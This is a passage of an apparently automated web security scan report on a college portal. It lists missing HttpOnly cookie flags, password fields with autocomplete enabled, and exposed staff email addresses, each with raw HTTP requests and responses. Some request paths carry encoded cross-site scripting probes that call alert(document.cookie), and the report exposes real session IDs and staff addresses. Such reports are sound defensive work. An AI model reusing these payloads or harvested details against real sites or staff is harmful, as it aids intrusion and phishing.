Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=clgvlihm9nanmg0nq5u945ea52; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: mycc_ss=2
Host: my.champlain.edu
Content-Length: 37
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

renderableItem=%2Fshow%2F30

Response

2.10. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=1s8lc1gfnqvs6v9god6mesb8n6; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: mycc_ss=2
Host: my.champlain.edu
Content-Length: 37
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

renderableItem=%2Fshow%2F38

Response

2.11. https://my.champlain.edu/index/index/forceload/true previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/index/index/forceload/true

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=vjmhpnkk97s46qlroe11hfj7m1; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index/index/forceload/true HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.12. https://my.champlain.edu/open/secure/group/facstaff/dir0/hr/file/Benefits_Enrollment_Guide.pdf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/open/secure/group/facstaff/dir0/hr/file/Benefits_Enrollment_Guide.pdf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=9l7i0kgs717k800lsb70na64u3; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /open/secure/group/facstaff/dir0/hr/file/Benefits_Enrollment_Guide.pdf HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/page_authrequired
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=9l7i0kgs717k800lsb70na64u3; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:36 GMT
Connection: close
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/page_authrequired">here</a></body>

2.13. https://my.champlain.edu/page_hr_benefitsdocuments previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/page_hr_benefitsdocuments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=qa4pip8gmguu2a004gs32bed03; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /page_hr_benefitsdocuments HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/page_authrequired
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=qa4pip8gmguu2a004gs32bed03; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:37 GMT
Connection: close
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/page_authrequired">here</a></body>

2.14. https://my.champlain.edu/page_search/search/type/people/query/{QUERY} previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/page_search/search/type/people/query/{QUERY}

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=5ko8bbk1kidlm5sbbu8iktih20; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /page_search/search/type/people/query/{QUERY} HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=5ko8bbk1kidlm5sbbu8iktih20; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:24 GMT
Connection: close
Content-Length: 93

{"identifier":"id","items":[{"id":"error","error_message":"No pages matched your query."}]}

2.15. https://my.champlain.edu/public/advising/pdfs/Spring previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/public/advising/pdfs/Spring

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=4b0ubnfblfli2pgquvghebbv84; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/advising/pdfs/Spring HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=4b0ubnfblfli2pgquvghebbv84; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:28 GMT
Connection: close
Content-Length: 1229

<!DOCTYPE html>
<html lang="en">
<head>



<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

2.16. https://my.champlain.edu/public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Instructor.pdf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Instructor.pdf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=aamt9k61kjiuq5m8a0b84nv665; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Instructor.pdf HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=aamt9k61kjiuq5m8a0b84nv665; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:28 GMT
Connection: close
Content-Length: 1229

<!DOCTYPE html>
<html lang="en">
<head>



<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

2.17. https://my.champlain.edu/public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Subject.pdf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Subject.pdf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=8j8qaustujnjk88ti6gn76nq80; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Subject.pdf HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=8j8qaustujnjk88ti6gn76nq80; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:29 GMT
Connection: close
Content-Length: 1229

<!DOCTYPE html>
<html lang="en">
<head>



<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

2.18. https://my.champlain.edu/public/human_resources/pandemic_form/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/public/human_resources/pandemic_form/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=an4qlsuvvs8godo2fciigdbdq3; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/human_resources/pandemic_form/ HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.19. https://my.champlain.edu/store_widgetstore previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/store_widgetstore

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=alpeioao1124vhjrqqmbdjg2r6; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store_widgetstore HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=alpeioao1124vhjrqqmbdjg2r6; path=/; secure
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:25 GMT
Connection: close
Content-Length: 9170

{"identifier":"widgetId","items":[{"checked":false,"widgetId":"root","title":"All Widgets","type":"folder","children":[{"widgetId":"oncampus","title":"On Campus","type":"category","checked":true,"chil
...[SNIP]...

2.20. https://my.champlain.edu/widget_campusdir/download previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/widget_campusdir/download

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=sdf74ue68ttm66cap9590mrhq6; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widget_campusdir/download HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/page_authrequired
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=sdf74ue68ttm66cap9590mrhq6; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:37 GMT
Connection: close
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/page_authrequired">here</a></body>

2.21. https://my.champlain.edu/widget_webadvisor/launch/page/webadvisor previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/widget_webadvisor/launch/page/webadvisor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=83os928btu80gtc5jvm3u0c582; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widget_webadvisor/launch/page/webadvisor HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/page_authrequired
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=83os928btu80gtc5jvm3u0c582; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:26 GMT
Connection: close
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/page_authrequired">here</a></body>

2.22. https://my.champlain.edu/x1501.xml previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/x1501.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=07eq083dhl8hb3cqft32or7354; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x1501.xml HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=07eq083dhl8hb3cqft32or7354; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:21 GMT
Connection: close
Content-Length: 1229

<!DOCTYPE html>
<html lang="en">
<head>



<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

2.23. https://my.champlain.edu/xhr/dird previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/xhr/dird

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=gkilk8211cvhk0uvf66aq7vdt7; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xhr/dird HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.24. https://my.champlain.edu/xhr/dirp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/xhr/dirp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=tf84vmr8ar3jarlnuvthfr88b0; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xhr/dirp HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3. Password field with autocomplete enabled previous next
There are 3 instances of this issue:

/
/index/index/forceload/true
/widget_login

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

3.1. https://my.champlain.edu/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/

Issue detail

The page contains a form with the following action URL:

https://my.champlain.edu/auth/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; path=/; secure
X-Powered-By: ASP.NET
Date: Sun, 25 Dec 2011 21:08:23 GMT
Content-Length: 9068

<!DOCTYPE html>
<html lang="en">
<head>



<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</div>
<form method="post" action="/auth/login">
<table border="0" cellspacing="0" align="right" class="myLoginTable">
...[SNIP]...
<td>
<input name="password" type="Password" height="20" id="loginPassword" tabindex="2" />
</td>
...[SNIP]...

3.2. https://my.champlain.edu/index/index/forceload/true previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/index/index/forceload/true

Issue detail

The page contains a form with the following action URL:

https://my.champlain.edu/auth/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /index/index/forceload/true HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=vjmhpnkk97s46qlroe11hfj7m1; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:24 GMT
Connection: close
Content-Length: 9104

<!DOCTYPE html>
<html lang="en">
<head>



<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</div>
<form method="post" action="/auth/login">
<table border="0" cellspacing="0" align="right" class="myLoginTable">
...[SNIP]...
<td>
<input name="password" type="Password" height="20" id="loginPassword" tabindex="2" />
</td>
...[SNIP]...

3.3. https://my.champlain.edu/widget_login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/widget_login

Issue detail

The page contains a form with the following action URL:

https://my.champlain.edu/auth/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /widget_login HTTP/1.1
Host: my.champlain.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://my.champlain.edu/page_authrequired
Cookie: PHPSESSID=d1k3utcleaggm7vui5dc3chko4; mycc_ss=2; III_EXPT_FILE=aa19822; III_SESSION_ID=28e0ae6538f8d09cb91f9878685079cf
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Sun, 25 Dec 2011 21:26:33 GMT
Content-Length: 2397

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.da
...[SNIP]...
<div>

<form method="post" action="/auth/login">
   <div id="loginWidgetError" style="display:none; color:red; text-align:center;">
...[SNIP]...
<td valign="top"><input type="password" name="password" id="loginWidgetPassword" /></td>
...[SNIP]...

4. Email addresses disclosed previous next
There are 6 instances of this issue:

/advising/curriculum/
/media/changeaddr.html
/page_about
/page_authrequired
/public/human_resources/pandemic_form/
/xhr/dird

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

4.1. https://my.champlain.edu/advising/curriculum/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/advising/curriculum/

Issue detail

The following email address was disclosed in the response:

huwilerm@champlain.edu

Request

GET /advising/curriculum/ HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=atvqqu6pjm1g5vfm796ruait51; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:33 GMT
Connection: close
Content-Length: 172700

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

4.2. https://my.champlain.edu/media/changeaddr.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/media/changeaddr.html

Issue detail

The following email address was disclosed in the response:

arc@champlain.edu

Request

GET /media/changeaddr.html HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Expires: Tue, 19 Jan 2038 03:14:07 GMT
Last-Modified: Wed, 02 Mar 2011 18:37:03 GMT
Accept-Ranges: bytes
ETag: "3336ead28d9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:33 GMT
Connection: close
Content-Length: 847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:arc@champlain.edu">arc@champlain.edu</a>
...[SNIP]...

4.3. https://my.champlain.edu/page_about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/page_about

Issue detail

The following email address was disclosed in the response:

huwilerm@champlain.edu

Request

GET /page_about HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: https://my.champlain.edu/page_about
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:45:26 GMT
Content-Length: 7931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

4.4. https://my.champlain.edu/page_authrequired previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/page_authrequired

Issue detail

The following email address was disclosed in the response:

huwilerm@champlain.edu

Request

GET /page_authrequired HTTP/1.1
Host: my.champlain.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.champlain.edu/
Cookie: PHPSESSID=d1k3utcleaggm7vui5dc3chko4; mycc_ss=2; III_EXPT_FILE=aa19822; III_SESSION_ID=28e0ae6538f8d09cb91f9878685079cf
Content-Length: 10

Response

4.5. https://my.champlain.edu/public/human_resources/pandemic_form/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/public/human_resources/pandemic_form/

Issue detail

The following email address was disclosed in the response:

huwilerm@champlain.edu

Request

GET /public/human_resources/pandemic_form/ HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=an4qlsuvvs8godo2fciigdbdq3; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:27 GMT
Connection: close
Content-Length: 2643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

4.6. https://my.champlain.edu/xhr/dird previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/xhr/dird

Issue detail

The following email addresses were disclosed in the response:

jkuzia@champlain.edu
lwheeler@champlain.edu
mmarcoux@champlain.edu
slindberg@champlain.edu

Request

POST /xhr/dird HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
Content-Length: 50
Origin: https://my.champlain.edu
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root

name=Pellitier&department=Event%20Center

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:49:54 GMT
Content-Length: 1314

